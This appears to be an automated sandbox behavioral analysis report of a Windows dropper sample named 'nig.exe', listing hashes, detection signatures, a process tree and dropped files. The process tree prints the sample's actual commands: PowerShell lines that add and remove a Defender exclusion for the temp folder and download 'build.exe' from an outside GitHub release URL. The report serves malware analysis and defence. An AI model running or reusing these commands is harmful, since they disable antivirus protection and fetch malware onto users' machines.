Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20250207-en -
resource tags
arch:x64arch:x86image:win7-20250207-enlocale:en-usos:windows7-x64system -
submitted
22/03/2025, 02:34
Behavioral task
behavioral1
Sample
nig.exe
Resource
win7-20250207-en
Behavioral task
behavioral2
Sample
nig.exe
Resource
win10v2004-20250314-en
General
-
Target
nig.exe
-
Size
56KB
-
MD5
827c7f426f6d6770d127ee96a29ad6db
-
SHA1
0ed96a36e037baef30f459cc54a50db51ca0e9d9
-
SHA256
90e7162a771d6d4ad5e46f38611fec16d2dee5583d628ef7bf205e727e6ebff4
-
SHA512
c2cba465541b8f5ecd7e8fd48bcbf7a02c97279b7c7edb10601d8d7646b28bb30059470248164a13122fd65de2a8318d4f337739dac326ea871d870bd1d8b782
-
SSDEEP
1536:U4dJooh0Wa0aer344Jw/ytUqVS5EkIijQ1fTNHmn5aHc:U4dzVTaer344JzthRZijQ1J6
Malware Config
Signatures
-
pid Process 2232 powershell.exe 2156 powershell.exe -
resource yara_rule behavioral1/memory/1716-0-0x0000000140000000-0x0000000140027000-memory.dmp upx behavioral1/memory/1716-27-0x0000000140000000-0x0000000140027000-memory.dmp upx -
Hide Artifacts: Ignore Process Interrupts 1 TTPs 2 IoCs
Command interpreters often include specific commands/flags that ignore errors and other hangups.
pid Process 2232 powershell.exe 2960 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2232 powershell.exe 2156 powershell.exe 2960 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2232 powershell.exe Token: SeDebugPrivilege 2156 powershell.exe Token: SeDebugPrivilege 2960 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 1716 wrote to memory of 2552 1716 nig.exe 30 PID 1716 wrote to memory of 2552 1716 nig.exe 30 PID 1716 wrote to memory of 2552 1716 nig.exe 30 PID 2552 wrote to memory of 1944 2552 cmd.exe 32 PID 2552 wrote to memory of 1944 2552 cmd.exe 32 PID 2552 wrote to memory of 1944 2552 cmd.exe 32 PID 1944 wrote to memory of 2652 1944 net.exe 33 PID 1944 wrote to memory of 2652 1944 net.exe 33 PID 1944 wrote to memory of 2652 1944 net.exe 33 PID 2552 wrote to memory of 2232 2552 cmd.exe 34 PID 2552 wrote to memory of 2232 2552 cmd.exe 34 PID 2552 wrote to memory of 2232 2552 cmd.exe 34 PID 2552 wrote to memory of 2156 2552 cmd.exe 35 PID 2552 wrote to memory of 2156 2552 cmd.exe 35 PID 2552 wrote to memory of 2156 2552 cmd.exe 35 PID 2552 wrote to memory of 2960 2552 cmd.exe 36 PID 2552 wrote to memory of 2960 2552 cmd.exe 36 PID 2552 wrote to memory of 2960 2552 cmd.exe 36
Processes
-
C:\Users\Admin\AppData\Local\Temp\nig.exe"C:\Users\Admin\AppData\Local\Temp\nig.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1716 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\903E.tmp\903F.tmp\9040.bat C:\Users\Admin\AppData\Local\Temp\nig.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2552 -
C:\Windows\system32\net.exenet session3⤵
- Suspicious use of WriteProcessMemory
PID:1944 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session4⤵PID:2652
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
- Hide Artifacts: Ignore Process Interrupts
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2232
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/build.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\build.exe\" -ErrorAction Stop"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2156
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -Command "Remove-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"3⤵
- Hide Artifacts: Ignore Process Interrupts
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2960
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD51c935ef28fdfd394b770d945d7f04d76
SHA129e251c3c40ce4ad1b2984bf26b444aa045d9b21
SHA256aa58e1df5882878a44687853f47d10b655c3fe888ec20fb99446305f5d38c681
SHA512a9e60f2ac4aec15a3ba0a95df224449f64777a027357792247dd597529542e79128aec996c89ff86a1654911b4b763c577d3c3d2f38c59b02b280b8ad824e7e1
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD555b4828145e7be3154ddaec4bc256346
SHA1ffaa9b6f9ce342da0a5e5a6f0eb743ec775f74a7
SHA256cc298f9ce853d5c55e2f31db9ecda01262963dcc566d3019e8bb2b0605999de3
SHA5126a28f9ddb3a42d9e3d170c13b9e885e041b2abd4baa7473bf646e18e4e6525ed5d6cc7570784cec8eb615750088b065a796066487c72cb5ed8b4104d10b223d0